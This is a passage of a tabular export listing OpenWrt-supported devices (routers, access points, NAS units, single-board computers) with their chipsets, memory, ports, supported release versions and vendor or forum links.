38 | WiFi AP | ZBT | WE1026-H | Available 2022 | 21.02.3 | MediaTek MT7620A | 580 | 1 | 16, 32, microSD | 128 | 2 | – | ¿ | – | ¿ | – | 1x 2.0 | View/Edit data | ||||||
39 | WiFi Router | ZyXEL | EMG2926-Q10A | 1.00, A02, A03 | Available 2022 | 21.02.3 | Qualcomm Atheros QCA9558 | 720 | 1 | 128NAND, 16 | 256 | – | 5 | b/g/n | a/n/ac | Qualcomm Atheros QCA9558, Qualcomm Atheros QCA9880v2 | – | 2x 2.0 | nbg6716 | https://forum.archive.openwrt.org/viewtopic.php?id=68668, https://forum.openwrt.org/t/difficulty-to-upgrade-zyxel-emg2926-q10a/50040/19, https://forum.openwrt.org/viewtopic.php?id=60141 | View/Edit data | |||
40 | Range Extender | ZyXEL | WRE6606 | unknown 2022 | 21.02.3 | Qualcomm Atheros IPQ4018 | 638 | 4 | 16 | 128 | – | 1 | b/g/n | a/n/ac | Qualcomm Atheros IPQ4018 | – | ¿ | View/Edit data | ||||||
41 | WiFi Router | Buffalo | WSR-1166DHP | unknown 2022 | 21.02.3 | MediaTek MT7621A | 880 | 2 | 16 | 128 | – | 5 | b/g/n | a/n/ac | MediaTek MT7603E, MediaTek MT7612E | – | – | wsr-1166dhp | https://forum.openwrt.org/viewtopic.php?id=62413 | View/Edit data | ||||
42 | Router | XiaoYu | XY-C5 | unknown 2022 | 21.02.3 | MediaTek MT7621A | 880 | 2 | 32 | 512 | – | 5 | – | – | – | – | 1x 3.0 | View/Edit data | ||||||
43 | WiFi Router | Buffalo | WZR-450HP2 | unknown 2022 | 19.07.10 | Qualcomm Atheros QCA9558 | 720 | 1 | 16 | 128 | – | 5 | b/g/n | – | Qualcomm Atheros QCA9558 | ¿ | ¿ | wzr-450hp2 | View/Edit data | |||||
44 | WiFi AP | devolo | WiFi pro 1750x | Available 2022 | 21.02.3 | Qualcomm Atheros QCA9558 | 720 | 1 | 16 | 128 | – | 1 | b/g/n | a/n/ac | Qualcomm Atheros QCA9558, Qualcomm Atheros QCA9880 | – | – | View/Edit data | ||||||
45 | WiFi AP | devolo | WiFi pro 1750i | Available 2022 | 21.02.3 | Qualcomm Atheros QCA9558 | 720 | 1 | 16 | 128 | – | 1 | b/g/n | a/n/ac | Qualcomm Atheros QCA9558, Qualcomm Atheros QCA9880 | – | – | View/Edit data | ||||||
46 | WiFi Router | MTC | WR1201 | Available 2022 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 16, microSD | 128 | – | 5 | b/g/n | a/n/ac | MediaTek MT7602EN, MediaTek MT7612EN | – | 1x 3.0 | http://forum.openwrt.org/t/support-for-strong-1200/22768 | View/Edit data | |||||
47 | WiFi Router | NETGEAR | R6230 | Available 2022 | 21.02.3 | MediaTek MT7621ST | 880 | 1 | 128 | 128 | ¿ | 5 | b/g/n | a/n/ac | MIMO 2×2 | MediaTek MT7603EN, MediaTek MT7612EN | – | 1x 2.0 | r6230 | View/Edit data | ||||
48 | Single Board Computer | WRTnode | WRTnode | 2P | unknown 2022 | 21.02.3 | MediaTek MT7628AN | 580 | 1 | 32 | 256 | 5 | – | b/g/n | – | MediaTek MT7628AN | – | 1x 2.0 | View/Edit data | |||||
49 | Emulator | VMware | VMware x86 virtual machine | 2022 latest | unknown 2022 | 15.05 | ¿ | x86 | ¿ | 1 | ¿ | ¿ | – | – | – | – | – | – | – | vmware | View/Edit data | |||
50 | WiFi Router | ZBT | ZBT-WD323 | Available 2022 | 21.02.3 | Atheros AR9344 | 560 | 1 | 16 | 128 | 3 | – | b/g/n | – | Atheros AR9340 | LTE | 1x 2.0 | View/Edit data | ||||||
51 | WiFi Router | Sophos | RED 15w | Rev. 1 | unknown 2022 | 21.02.3 | Freescale P1010 | ¿ | 1 | 128NAND | 128 | – | 5 | b/g/n | a/n | Atheros AR9382, SparkLan WPEA-121N | – | 1x 2.0 | View/Edit data | |||||
52 | WiFi AP | Aruba | AP-105 | Available 2022 | 21.02.3 | Atheros AR7161 | 680 | 1 | 16 | 128 | – | 1 | b/g/n | a/n | Atheros AR9220, Atheros AR9223 | – | – | ap-105 | View/Edit data | |||||
53 | Single Board Computer | WIZnet | WizFi630S | Available 2022 | 21.02.3 | MediaTek MT7688AN | 580 | 1 | 32 | 128 | 3 | – | b/g/n | – | MediaTek MT7688 | – | 1x 2.0 | View/Edit data | ||||||
54 | WiFi Router | ALFA Network | AP120C | Available 2020 | 18.06.9 | Atheros AR9344 | 533 | 1 | 16 | 128 | – | 1 | b/g/n | a/n | 2×2 | Atheros AR9344 | – | – | ap120c | https://forum.openwrt.org/viewtopic.php?pid=270401 | View/Edit data | |||
55 | NAS | Cloud Engines | Pogoplug V4 | POGO-V4-A3-01, POGO-V4-A3-02 | Available 2020 | 21.02.3 | Marvell 88F6192 | 800 | 1 | 128NAND, SD | 128 | – | 1 | – | – | – | – | 1x 2.0, 2x 3.0 | pogoplug_v4 | View/Edit data | ||||
56 | NAS | Cloud Engines | Pogoplug Mobile | POGO-V4-A1-01 | unknown 2022 | 21.02.3 | Marvell 88F6192 | 800 | 1 | 128NAND | 128 | – | 1 | – | – | – | – | 1x 2.0 | pogoplug_v4 | https://forum.openwrt.org/viewtopic.php?id=51769 | View/Edit data | |||
57 | Single Board Computer | Cubitech | CubieBoard2 | Available 2022 | 21.02.3 | Allwinner A20 | 1000 | 2 | 4096NAND, microSD | 1024 | 1 | – | – | – | – | – | 2x 2.0 | cubieboard2 | View/Edit data | |||||
58 | Single Board Computer | Cubitech | CubieBoard3 (Cubietruck) | Available 2022 | 21.02.3 | Allwinner A20 | 1000 | 2 | 8192NAND, microSD | 2048 | – | 1 | b/g/n | – | Broadcom BCM4329 | – | 2x 2.0 | cubietruck | View/Edit data | |||||
59 | unknown | DomyWifi | DW33D | unknown 2022 | 18.06.9 | Qualcomm Atheros QCA9558-AT4A | 720 | 1 | 128NAND, 16 | 256 | – | 5 | b/g/n | a/n/ac | Qualcomm Atheros QCA9558, Qualcomm Atheros QCA9880 | – | 2x 2.0 | View/Edit data | ||||||
60 | Single Board Computer | Marvell | Armada A370 DB | unknown 2022 | 21.02.3 | Marvell Armada A370 | ¿ | 1 | ¿ | ¿ | ¿ | ¿ | ¿ | ¿ | ¿ | ¿ | ¿ | View/Edit data | ||||||
61 | Single Board Computer | Marvell | DB-88F3720-DDR3 | unknown 2022 | 21.02.3 | Marvell Armada 3700LP 88F3720 | 1000 | 2 | 128, 8192 eMMC | 4096 | – | 1 | – | – | – | – | 1x 2.0, 1x 3.0 | View/Edit data | ||||||
62 | Single Board Computer | Marvell | RD-MV784MP-GP | unknown 2022 | 17.01.4 | Marvell Armada XP MV78460 | 1600 | 4 | 1024NAND | ¿ | – | 4 | ¿ | ¿ | 3x PCIe | ¿ | 2x 2.0 | View/Edit data | ||||||
63 | NAS | RaidSonic | IB-NAS62x0 | unknown 2022 | 21.02.3 | Marvell 88F6281 | 1200 | 1 | 256NAND | 256 | – | 1 | – | – | – | – | 3x 2.0 | View/Edit data | ||||||
64 | Single Board Computer | Samsung | TQ210 | unknown 2022 | 19.07.10 | Samsung S5PV210 | 1000 | ¿ | 1024NAND, microSD, SD | 1024 | 1 | – | – | – | – | – | 1x OTG, 3x 2.0 | View/Edit data | ||||||
65 | Single Board Computer | WRTnode | WRTnode | 2Q | unknown 2022 | 19.07.10 | Qualcomm Atheros QCA9531 | 560 | 1 | 16 | 128 | 5 | – | b/g/n | – | Qualcomm Atheros QCA9531 | ¿ | ¿ | View/Edit data | |||||
66 | Single Board Computer | WRTnode | WRTnode | 2R | Available 2020 | 21.02.3 | MediaTek MT7688AN | 580 | 1 | 32 | 256 | 5 | – | b/g/n | – | MediaTek MT7688AN | – | 1x 2.0 | View/Edit data | |||||
67 | WiFi AP | YunCore | A782 | unknown 2022 | 21.02.3 | Qualcomm Atheros QCA9563 | 775 | 1 | 16 | 128 | – | 2 | b/g/n | a/n/ac | Qualcomm Atheros QCA9563, Qualcomm Atheros QCA9886 | – | – | View/Edit data | ||||||
68 | Single Board Computer | Cubitech | CubieBoard1 | Available 2022 | 21.02.3 | Allwinner A10 | 1000 | 1 | 4096NAND, microSD | 1024 | 1 | – | – | – | – | – | 2x 2.0 | http://cubieboard.org/model/cb1/ | cubieboard | View/Edit data | ||||
69 | WiFi AP | Ubiquiti | UniFi AC Mesh Pro | Available 2022 | 21.02.3 | Qualcomm Atheros QCA9563-AL3A | 775 | 1 | 16 | 128 | – | 2 | b/g/n | a/n/ac | Qualcomm Atheros QCA9563, Qualcomm Atheros QCA9880 | – | – | http://dl.ubnt.com/datasheets/unifi/UniFi_AC_Mesh_DS.pdf | unifiac | View/Edit data | ||||
70 | Range Extender | COMFAST | CF-WR752AC | v1 | Available 2020 | 21.02.3 | Qualcomm Atheros QCA9531 | 650 | 1 | 16 | 128 | 1 | – | b/g/n | a/n/ac | Qualcomm Atheros QCA9531, Qualcomm Atheros QCA9886 | – | – | http://en.comfast.com.cn/index.php?m=content&c=index&a=show&catid=14&id=50 | View/Edit data | ||||
71 | WiFi Router | COMFAST | CF-WR650AC | v2 | Available 2022 | 21.02.3 | Qualcomm Atheros QCA9558 | 720 | 1 | 16 | 256 | – | 5 | b/g/n | a/n/ac | Qualcomm Atheros QCA9558, Qualcomm Atheros QCA9880 | – | – | http://en.comfast.com.cn/index.php?m=content&c=index&a=show&catid=16&id=21 | View/Edit data | ||||
72 | WiFi AP | COMFAST | CF-E385AC | Available 2022 | 19.07.10 | LAN interface if connected at boot time | Qualcomm Atheros QCA9558 | 720 | 1 | 16 | 256 | – | 2 | b/g/n | a/n/ac | Qualcomm Atheros QCA9558, Qualcomm Atheros QCA9984 | – | – | http://en.comfast.com.cn/index.php?m=content&c=index&a=show&catid=17&id=55 | cf-e385ac | View/Edit data | |||
73 | WiFi AP | COMFAST | CF-EW72 | Available 2022 | 21.02.3 | Qualcomm Atheros QCA9531-BL3A | 650 | 1 | 16 | 128 | 2 | – | b/g/n | a/n/ac | MIMO config | Qualcomm Atheros QCA9531, Qualcomm Atheros QCA9886 | – | – | http://en.comfast.com.cn/index.php?m=content&c=index&a=show&catid=84&id=39 | cf-ew72 | View/Edit data | |||
74 | WiFi AP | COMFAST | CF-E375AC | Available 2022 | 19.07.10 | Qualcomm Atheros QCA9563 | 775 | 1 | 16 | 128 | – | 2 | b/g/n | a/n/ac | Qualcomm Atheros QCA9563, Qualcomm Atheros QCA9886 | – | – | http://en.comfast.com.cn/product/item-331.html | View/Edit data | |||||
75 | WiFi AP | COMFAST | CF-E355AC | v2 | Available 2022 | 19.07.10 | Qualcomm Atheros QCA9531 | 650 | 1 | 16 | 128 | 2 | – | b/g/n | a/n/ac | Qualcomm Atheros QCA9531, Qualcomm Atheros QCA9886 | – | – | http://en.comfast.com.cn/product/WirelessAP/item-218.html | View/Edit data | ||||
76 | WiFi AP | COMFAST | CF-E380AC | v2 | Available 2020 | 19.07.10 | Qualcomm Atheros QCA9558 | 720 | 1 | 16 | 256 | – | 1 | b/g/n | a/n/ac | Qualcomm Atheros QCA9558, Qualcomm Atheros QCA9880 | – | – | http://en.comfast.com.cn/product/WirelessNetworkBridge/item-219.html | View/Edit data | ||||
77 | Single Board Computer | Globalscale | ESPRESSObin | V7 | Available 2022 | 19.07.7 | Marvell Armada 3700LP 88F3720 | 1200 | 2 | 4096, eMMC, microSDHC | 1024 | – | 3 | – | – | 1x mini-PCIe | – | 1x 2.0, 1x 3.0 | http://espressobin.net/ | espressobin_v7 | View/Edit data | |||
78 | WiFi AP | D-Link | DAP-3662 | A1 | unknown 2021 | 21.02.0 | Qualcomm Atheros QCA9557 | 720 | 1 | 16 | 128 | – | 2 | b/g/n | a/n/ac | Qualcomm Atheros QCA9557, Qualcomm Atheros QCA9882 | – | – | http://eu.dlink.com/uk/en/products/dap-3662-wireless-ac1200-concurrent-dual-band-outdoor-poe-access-point | View/Edit data | ||||
79 | WiFi Router | Intellidesign | Hyrax PCP-100 | A | unknown 2022 | 18.06.9 | Atmel ATSAMA5D35 | 536 | 1 | 256NAND | 256 | 2 | – | b/g/n | – | CSR WF111 | Mobile Wireless/Cellular network | Yes | http://intellidesign.com.au/?portfolio=hyrax-pcp-100-iot-platform | hyrax | View/Edit data | |||
80 | WiFi Router | ipTIME | A8004T | Available 2021 | 21.02.3 | WiFi 2.4 Ghz | MediaTek MT7621A | 880 | 2 | 16 | 256 | – | 5 | b/g/n | a/n/ac | 4×4 MU-MIMO | MediaTek MT7615E | – | 1x 3.0 | http://iptime.com/iptime/?page_id=11&pf=3&page=&pt=375&pd=1 | a8004t | View/Edit data | ||
81 | WiFi Router | ipTIME | A3004T | Available 2021 | snapshot | MT7621A | 880 | 2 | 128NAND | 256 | – | 5 | b/g/n | a/n/ac | radio0 will not work with 5GHz, use radio1 instead. | MT7615E | – | 1x 3.0 | http://iptime.com/iptime/?page_id=11&pf=3&page=&pt=535&pd=1 | View/Edit data | ||||
82 | WiFi Router | WeVO | 11AC NAS | unknown 2022 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 16 | 256 | – | 5 | b/g/n | a/n/ac | MediaTek MT7603EN, MediaTek MT7612EN | – | 1x 3.0 | http://iwevo.co.kr/product_intro.php?model=011010 | View/Edit data | |||||
83 | Router | PlatHome | OpenBlocks AX3-4 | Available 2022 | 21.02.3 | Marvell Armada XP MV78260 | 1333 | 2 | 128 | 1024 | – | 4 | – | – | WLAN optionally available | – | – | 1x 2.0 | http://openblocks.plathome.co.jp/products/obs_a/ax3/ | View/Edit data | ||||
84 | Router | PC Engines | APU3C2 | Available 2022 | 21.02.3 | AMD GX-412TC | 1000 | 4 | SD | 2048 | – | 3 | – | – | – | – | 2x 3.0 | http://pcengines.ch/apu3c2.htm | apu3 | View/Edit data | ||||
85 | Router | PC Engines | APU3C4 | Available 2022 | 21.02.3 | AMD GX-412TC | 1000 | 4 | SD | 4096 | – | 3 | – | – | – | – | 2x 3.0 | http://pcengines.ch/apu3c4.htm | apu3 | View/Edit data | ||||
86 | WiFi Router | Qxwlan | E2600AC | C2 | unknown 2022 | 21.02.3 | Qualcomm IPQ4019 | ¿ | 4 | 16 | 256 | – | 3 | b/g/n | a/n/ac | Qualcomm Atheros IPQ4019 | – | 1x 3.0 | http://qxwlan.com/product/p/91.html | e2600ac | View/Edit data | |||
87 | WiFi Router | Qxwlan | E2600AC | C1 | unknown 2022 | 21.02.3 | Qualcomm IPQ4019 | ¿ | 4 | 32 | 256 | – | 3 | b/g/n | a/n/ac | Qualcomm IPQ4019 | – | 1x 3.0 | http://qxwlan.com/product/p/91.html | View/Edit data | ||||
88 | Single Board Computer | MikroTik | RB951G-2HnD | Available 2022 | 19.07.10 | Gbit ports | Atheros AR9344 | 600 | 1 | 128NAND | 128 | – | 5 | b/g/n | – | Atheros AR9344 | – | 1x 2.0 | http://routerboard.com/RB951G-2HnD | rb951g_2hnd | View/Edit data | |||
89 | Single Board Computer | MikroTik | RB951Ui-2HnD | Available 2022 | 19.07.10 | Atheros AR9344 | 600 | 1 | 128NAND | 128 | 5 | – | b/g/n | – | Atheros AR9344 | – | 1x 2.0 | http://routerboard.com/RB951Ui-2HnD | rb951ui | View/Edit data | ||||
90 | WiFi Router | Teltonika | RUTX11 | Available 2022 | snapshot | Qualcomm Atheros IPQ4018 | 716 | 4 | 16, 256NAND | 256 | – | 4 | b/g/n | a/n/ac | Qualcomm Atheros IPQ4019 | LTE | 1x 2.0 | http://teltonika-networks.com/product/rutx11/ | View/Edit data | |||||
91 | WiFi Router | UniElec | U7623 | Available 2020 | 21.02.3 | MediaTek MT7623N | 1300 | 4 | 8192 eMMC | 512 | – | 5 | – | – | Order with choice of mini-PCIe WLAN, supports some third party boards | 2x mini-PCIe | – | 1x 3.0 | http://unielecinc.com/q/news/cn/p/product/detail.html?qd_guid=OjXwKCaRlN | u7623 | View/Edit data | |||
92 | WiFi Router | D-Link | DAP-2695 | A1 | Available 2022 | 21.02.3 | Qualcomm Atheros QCA9558 | 720 | 1 | 16 | 256 | – | 2 | b/g/n | a/n/ac | Qualcomm Atheros QCA9558, Qualcomm Atheros QCA9880 | – | – | http://us.dlink.com/products/business-solutions/wireless-ac1750-simultaneous-dual-band-poe-access-point/ | dap-2695 | View/Edit data | |||
93 | Single Board Computer | VoCore | VoCore2 | Available 2022 | 21.02.3 | MediaTek MT7628AN | 580 | 1 | 16 | 128 | 1 | – | b/g/n | – | MediaTek MT7628AN | – | 1x µUSB (power) | http://vocore.io/v2.html | View/Edit data | |||||
94 | WiFi AP | devolo | WiFi pro 1750e | Available 2022 | 21.02.3 | Qualcomm Atheros QCA9558 | 720 | 1 | 16 | 128 | – | 2 | b/g/n | a/n/ac | 3T3R MIMO (2.4Ghz 450Mbps, 5Ghz 1299Mbps, 3x RP-SMA 2dBi dual-band antennas) | Qualcomm Atheros QCA9558, Qualcomm Atheros QCA9880 | – | 1x 2.0 | http://web.archive.org/web/20220630105124/http://www.devolo.com:80/en/Business-Solutions/Wi-Fi-Pro/devolo-WiFi-pro-1750e | wifi_pro_1750e | https://forum.openwrt.org/t/devolo-wifi-pro-1750e-edimax-pro-wap1750-acelink-ew-7679wac/ | View/Edit data | ||
95 | Single Board Computer | Sinovoip | Banana Pi M2 Berry | unknown 2021 | snapshot | Allwinner V40 | 1200 | 4 | microSD | 1024 | – | 1 | b/g/n | – | AMPAK AP6212 | – | 1x OTG, 1x µUSB (power), 4x 2.0 | http://wiki.banana-pi.org/Banana_Pi_BPI-M2_Berry | View/Edit data | |||||
96 | Single Board Computer | FriendlyARM | NanoPi NEO | Available 2022 | 21.02.3 | Allwinner H3 | 1200 | 4 | microSD | 512 | 1 | – | – | – | – | – | 1x 2.0 | http://wiki.friendlyarm.com/wiki/index.php/NanoPi_NEO | View/Edit data | |||||
97 | Single Board Computer | FriendlyARM | NanoPi NEO Air | unknown 2022 | 21.02.3 | Allwinner H3 | 1200 | 4 | 8192 eMMC, microSDHC | 512 | – | – | b/g/n | – | AMPAK AP6212 | – | 1x OTG | http://wiki.friendlyarm.com/wiki/index.php/NanoPi_NEO_Air | View/Edit data | |||||
98 | Single Board Computer | FriendlyARM | NanoPi R1 | Available 2020 | 21.02.3 | Allwinner H3 | 1200 | 4 | 8192 eMMC, SD | 1024 | 1 | 1 | b/g/n | – | AMPAK AP6212 | – | 1x OTG, 1x µUSB (power), 2x 2.0 | http://wiki.friendlyarm.com/wiki/index.php/NanoPi_R1 | View/Edit data | |||||
99 | Single Board Computer | FriendlyARM | ZeroPi | Available 2021 | 21.02.3 | Allwinner H3 | 1200 | 4 | microSDHC | 512 | – | 1 | – | – | – | – | 1x 2.0, 1x µUSB (power) | http://wiki.friendlyarm.com/wiki/index.php/ZeroPi | View/Edit data | |||||
100 | Router | SolidRun | ClearFog Pro | v2.1 | Available 2020 | 21.02.3 | Marvell Armada 380 | 1600 | 2 | microSD | 1024 | – | 6 | – | – | – | – | 1x 3.0 | http://wiki.solid-run.com/doku.php?id=products:a38x:clearfog | clearfog | http://forum.solid-run.com/software-f32/openwrt-chaos-calmer-15-05-or-trunk-t2939.html | View/Edit data | ||
101 | Single Board Computer | 8devices | Rambutan | Available 2022 | 21.02.3 | Qualcomm Atheros QCA9557 | 720 | 1 | 128NAND | 128 | 1 | 1 | b/g/n | a/n | ¿ | – | 1x 2.0 | http://www.8devices.com/products/rambutan | View/Edit data | |||||
102 | Single Board Computer | Abicom International | Scorpion SC300M | Available 2020 | 19.07.10 | Qualcomm Atheros QCA9550 | 700 | 1 | 16 | 256 | – | 1 | b/g/n | a/n | Qualcomm Atheros QCA9550 | – | Yes | http://www.abicom.co.uk/products/oem-wireless-bridges/ | View/Edit data | |||||
103 | Single Board Computer | Abicom International | Scorpion SC450 | Rev 02 | Available 2020 | 19.07.10 | Qualcomm Atheros QCA9550 | 700 | 1 | 16, 256NAND | 256 | – | 1 | – | a/n/ac | Qualcomm Atheros QCA9550 | – | 2x 2.0 | http://www.abicom.co.uk/products/oem-wireless-bridges/ | scorpion450 | View/Edit data | |||
104 | Single Board Computer | Abicom International | Scorpion SC1750 | 4 | Available 2020 | 19.07.10 | Qualcomm Atheros QCA9550 | 700 | 1 | 16 | 256 | – | 2 | – | a/n/ac | QCA9890/QCA9892 | – | 1x 2.0 | http://www.abicom.co.uk/products/oem-wireless-bridges/ | sc1750 | View/Edit data | |||
105 | WiFi Router | ADSLR | G7 | unknown 2022 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 16 | 256 | – | 5 | b/g/n | a/n/ac | 4×4 MU-MIMO | MediaTek MT7615N | – | – | http://www.adslr.com/product/85.html | View/Edit data | ||||
106 | WiFi Router | NEC | Aterm WG2600HP | Available 2022 | 21.02.3 | Qualcomm Atheros IPQ8064 | 1400 | 2 | 32 | 512 | – | 5 | b/g/n | a/n/ac | Qualcomm Atheros QCA9980 | – | 1x 3.0 | http://www.aterm.jp/product/atermstation/product/warpstar/wg2600hp/index.html | View/Edit data | |||||
107 | WiFi Router | Atlantis | A02-RB-W300N | v1.0 | unknown 2022 | 19.07.7 | Atheros AR9130 | ¿ | 1 | ¿ | ¿ | 5 | – | b/g/n | – | ¿ | – | – | http://www.atlantisland.it/pub/prodotti.php?famiglia=1&l1=2&l2=3&articolo=QTAyLVJCLVczMDBO | View/Edit data | ||||
108 | Single Board Computer | Sinovoip | Banana Pi R2 | 1.2 | Available 2021 | 19.07.10 | Bluetooth, WiFi 2.4GHz | MediaTek MT7623N | 1300 | 4 | 8192 eMMC, microSD | 2048 | – | 5 | b/g/n | a/n | MediaTek MT6625LN | – | 1x OTG, 2x 3.0 | http://www.banana-pi.com/eacp_view.asp?id=104 | banana_pi_r2 | View/Edit data | ||
109 | Single Board Computer | Sinovoip | Banana Pi M2 Ultra | BPI-M2U | Available 2022 | snapshot | eMMC, WiFi 2.4GHz | Allwinner R40 | 1200 | 4 | microSD | 2048 | – | 1 | b/g/n | – | AMPAK AP6212 | – | 2x 2.0 | http://www.banana-pi.org/m2u.html | https://forum.openwrt.org/t/adding-support-for-the-banana-pi-m2-ultra/44379 | View/Edit data | ||
110 | Single Board Computer | Lamobo | BananaPi R1 | Available 2022 | 21.02.3 | Allwinner A20 | 1000 | 2 | microSD | 1024 | – | 5 | b/g/n | – | Realtek RTL8192CU | – | 1x 2.0, 1x µUSB (power) | http://www.banana-pi.org/r1.html | bananapi_r1 | View/Edit data | ||||
111 | WiFi Router | Sinovoip | Banana Pi BPi-R64 | V1.1 | Available 2021 | snapshot | MT7622AV | 1350 | 2 | 8192 eMMC | 1024 | – | 5 | b/g/n | – | MediaTek MT7622AV | – | 1x 3.0 | http://www.banana-pi.org/r64.html | bananapi_bpi-r64_v1.1 | View/Edit data | |||
112 | WiFi Router | BDCOM | WAP2100-SK | unknown 2022 | 21.02.3 | MediaTek MT7620A | 580 | 1 | 16, SD | 128 | 5 | – | b/g/n | – | ¿ | – | 1x 2.0 | http://www.bdcom.cn/products_detail/productId=95.html | View/Edit data | |||||
113 | Single Board Computer | Compex | WPJ563 | Available 2020 | 21.02.3 | Qualcomm Atheros QCA9563 | 775 | 1 | 16 | 128 | – | 2 | b/g/n | – | Qualcomm Atheros QCA9563 | – | – | http://www.compex.com.sg/product/wpj563/ | View/Edit data | |||||
114 | Single Board Computer | Compex | WPQ864 | Available 2020 | 21.02.3 | USB | Qualcomm Atheros IPQ8064 | 1400 | 2 | 256NAND, 32 | 1024 | – | 5 | – | – | 3x mini-PCIe | – | 1x 3.0 | http://www.compex.com.sg/product/wpq864/ | View/Edit data | ||||
115 | WiFi AP | CreatComm | TA8H | unknown 2020 | external image | Qualcomm Atheros QCA9557 | 560 | 1 | 16 | 128 | ¿ | 2 | b/g/n | a/n/ac | Qualcomm Atheros QCA9882 | ¿ | ¿ | http://www.creatcomm.com/zh/indoor-wifi-ap_zh/ta8h_zh/ | View/Edit data | |||||
116 | WiFi AP | CreatComm | TA8K | Available 2020 | external image | Quad-core ARM Cortex-A7 710 MHz | 710 | 4 | 32 | 256 | – | 2 | b/g/n | a/n/ac | MIMO 2*2 | Qualcomm Atheros IPQ4028 | – | – | http://www.creatcomm.com/zh/ta8k/ | View/Edit data | ||||
117 | WiFi Router | Cudy | WR1300 | Available 2021 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 16 | 128 | – | 5 | b/g/n | a/n/ac | MediaTek MT7603E, MediaTek MT7612E | – | 1x 3.0 | http://www.cudytech.com/productinfo/90088.html | View/Edit data | |||||
118 | WiFi Router | devolo | dLAN pro 1200 WiFi ac | Available 2022 | 19.07.10 | Powerline only supported by external package feed | Atheros AR9344 | 560 | 1 | 16 | 128 | – | 2 | b/g/n | a/n/ac | Atheros AR9344, Qualcomm Atheros QCA9882-BR4A | Powerline | – | http://www.devolo.de/business-solutions/produkte/article/dlan-pro-1200-wifi-ac/ | dlan_pro_1200_wifi_ac | View/Edit data | |||
119 | WiFi Router | Gainstrong | MiniBox | v3.2 | Available 2022 | 19.07.10 | Qualcomm Atheros QCA9531 | 550 | 1 | 16 | 128 | 2 | – | b/g/n | a/n | Qualcomm Atheros QCA9531, Qualcomm Atheros QCA9887 | – | 1x 2.0, 1x µUSB (power) | http://www.gainstrong.cn/product/minibox-v3-2-2/ | View/Edit data | ||||
120 | other | Gainstrong | Oolite | v5.2 | Available 2022 | 19.07.10 | Qualcomm Atheros QCA9531 | 650 | 1 | 16 | 128 | 5 | – | b/g/n | a/n/ac | Qualcomm Atheros QCA9531, Qualcomm Atheros QCA9887 | – | 1x 2.0 | http://www.gainstrong.cn/product/oolite-v5-2/ | View/Edit data | ||||
121 | Single Board Computer | Gateworks | Newport GW6400 | unknown 2022 | snapshot | Cavium CN8020 | 800 | 2 | 8192 | 1024 | – | 5 | – | – | 3x mini-PCIe | – | 1x 3.0, 2x 2.0 | http://www.gateworks.com/octeon-tx-single-board-computers-gateworks-newport | gateworks | View/Edit data | ||||
122 | Single Board Computer | Gateworks | Newport GW6100 | unknown 2022 | snapshot | Cavium CN8021 | 800 | 2 | 8192 | 1024 | – | 1 | – | – | 1x mini-PCIe | – | 1x 2.0 | http://www.gateworks.com/octeon-tx-single-board-computers-gateworks-newport | gateworks | View/Edit data | ||||
123 | Single Board Computer | Gateworks | Newport GW6200 | unknown 2022 | snapshot | Cavium CN8021 | 800 | 2 | 8192 | 1024 | – | 2 | – | – | 2x mini-PCIe | – | 1x 2.0, 1x 3.0 | http://www.gateworks.com/octeon-tx-single-board-computers-gateworks-newport | gateworks | View/Edit data | ||||
124 | Single Board Computer | Gateworks | Newport GW6300 | unknown 2022 | snapshot | Cavium CN8020 | 800 | 2 | 8192 | 1024 | – | 2 | – | – |